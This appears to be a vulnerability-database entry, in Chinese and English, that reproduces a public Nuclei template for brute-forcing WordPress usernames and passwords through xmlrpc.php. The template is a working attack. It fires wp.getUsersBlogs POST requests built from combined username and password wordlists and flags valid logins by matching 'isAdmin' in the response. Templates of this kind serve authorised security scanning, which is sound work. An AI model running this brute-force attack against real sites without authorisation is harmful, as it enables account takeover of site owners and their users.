漏洞描述
This template bruteforces username and passwords through xmlrpc.php being available.
wordpress-xmlrpc-brute-force: Wordpress XMLRPC.php username and password Bruteforcer
PoC代码[已公开]
id: wordpress-xmlrpc-brute-force
info:
name: Wordpress XMLRPC.php username and password Bruteforcer
author: Exid
severity: high
description: This template bruteforces username and passwords through xmlrpc.php being available.
reference:
- https://bugdasht.ir/reports/3c6841c0-ae4c-11eb-a510-517171a9198c
- https://www.acunetix.com/vulnerabilities/web/wordpress-xml-rpc-authentication-brute-force/
metadata:
max-request: 276
tags: wordpress,php,xmlrpc,fuzz,vuln
http:
- raw:
- |
POST /xmlrpc.php HTTP/1.1
Host: {{Hostname}}
Content-Length: 235
<?xml version="1.0" encoding="UTF-8"?>
<methodCall>
<methodName>wp.getUsersBlogs</methodName>
<params>
<param>
<value>{{username}}</value>
</param>
<param>
<value>{{password}}</value>
</param>
</params>
</methodCall>
attack: clusterbomb
payloads:
username: helpers/wordlists/wp-users.txt
password: helpers/wordlists/wp-passwords.txt
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: body
words:
- 'url'
- 'xmlrpc'
- 'isAdmin'
condition: and
# digest: 4a0a00473045022100f3985c1b023e44971f87a2c5ad98728da6bc2ceb34c71383ea22af1d3bfafb8e022004da4e1aac71abc24307ebaf70c5b890a7047a4820933cacd3332071402413bb:922c64590222798bb761d5b6d8e72950